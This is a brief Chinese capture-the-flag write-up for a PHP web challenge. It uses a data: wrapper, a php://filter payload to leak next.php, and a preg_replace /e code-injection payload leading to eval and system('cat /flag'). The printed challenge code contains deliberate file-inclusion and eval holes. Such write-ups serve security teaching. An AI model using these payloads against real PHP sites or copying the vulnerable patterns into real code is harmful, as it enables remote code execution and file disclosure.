打开环境可以的到
<?phperror_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";if(preg_match("/flag/",$file)){
die("Not now!");}include($file); //next.php}
else{
highlight_file(__FILE__);
}
?>
这里很简单
直接构造payload:
?text=data:,I have a dream&file=php://filter/read=convert.base64-encode/resource=next.php
得到:
base解码后得到
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;function complex($re, $str) {
return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}function getFlag(){
@eval($_GET['cmd']);
}
这里有个
preg_replace(’/(’ . $re . ‘)/ei’, 'strtolower("\1")
相关知识链接
所以构造
next.php?\S*=${
phpinfo()}
发现绕过成功
所以构造payload
next.php?\S*=${
getFlag()}&cmd=system("cat%20/flag");
得到flag
希望这篇文章能帮助你!